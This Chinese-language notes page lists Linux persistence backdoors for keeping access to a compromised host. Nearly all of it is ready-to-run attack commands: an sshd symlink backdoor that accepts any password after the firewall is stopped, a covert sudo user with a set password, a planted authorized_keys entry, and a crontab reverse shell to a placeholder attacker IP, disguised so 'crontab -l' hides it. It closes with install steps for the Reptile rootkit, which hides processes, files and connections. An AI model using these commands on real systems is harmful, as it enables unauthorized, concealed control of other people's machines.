权限维持-Linux后门

@wintry大约 1 分钟

SSH软连接后门

#建立sshd的软连接
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=12345
systemctl stop firewalld

#连接目标,密码随便输入即可
ssh root@212.1x9.2xx.xx7 -p12345
 
#删除后门
rm -rf /tmp/su

增加超级用户账号

如果系统不允许uid=0的用户(root)远程登录,可以添加一个普通用户,并将其加入sudoers

增加用户

#添加账户,设置密码(密码符合要密码强度策略)
useradd phP
echo @admin.886|passwd --stdin phP


#修改sudoers赋予sudo权限
chmod +w /etc/sudoers   
echo "phP ALL=(ALL) ALL" >> /etc/sudoers
chmod -w /etc/sudoers

SSH公钥登录

#本机生成rsa公钥
ssh-keygen -t rsa

#把id_rsa.pub写入服务端的authorized_keys中
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
echo "id_rsa.pub的内容" > ~/.ssh/authorized_keys

#没有这个文件的话,就自己创建一个
mkdir -p ~/.ssh
touch ~/.ssh/authorized_keys

Crontab定时反弹shell

(crontab -l;printf "*/1 * * * * exec 9<> /dev/tcp/攻击者IP/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

#每分钟执行一次,并且crontab -l看不出来
#这种要用crontab -e 进去查看并编辑才能看到

RootKit

https://github.com/f0rb1dd3n/Reptileopen in new window

特点

Ø网络隐藏(TCP/UDP)

Ø文件隐藏

Ø进程隐藏

Ø持久性隐藏(自启动)

Ø本地权限提升

ØICMP/UDP/TCP 端口锁定后门

Ø具有文件传输功能的完整 TTY/PTY Shell

Ø外壳每 X 次回连(非默认)

安装服务端
yum install -y ncurses-devel

make menuconfig

make #设置好配置后,只需运行 make,它就会生成所需的一切

make install #安装
安装客户端
yum install readline-devel

make client #编译客户端

./client         #运行客户端